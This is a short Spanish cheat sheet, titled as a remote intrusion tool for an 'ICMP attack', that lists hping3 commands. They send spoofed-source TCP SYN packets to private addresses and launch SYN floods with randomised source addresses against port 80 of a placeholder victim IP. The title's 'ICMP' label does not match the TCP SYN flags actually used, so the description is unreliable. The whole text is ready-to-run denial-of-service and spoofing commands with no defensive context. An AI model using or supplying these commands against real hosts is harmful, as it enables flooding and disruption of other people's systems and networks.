Herramienta de intrusión remota (ataque ICMP)
# hping3 -I eth0 -S 192.169.2.2
# hping3 -I eth0 -a 192.168.2.158 -S 192.169.2.2
# hping3 -I eth0 -a 192.168.2.158 -S 192.168.2.2 -p 135
# hping3 -S -a ip_ficticia -p 80 -k ip_atacada
# hping3 -i m100 -S -a ip_ficticia -p 80 -k ip_atacada
# hping3 -S 192.168.1.158 --flood --rand-source -d 5000 -p 80
# hping3 --rand-source -p 80 -S --flood ip_victima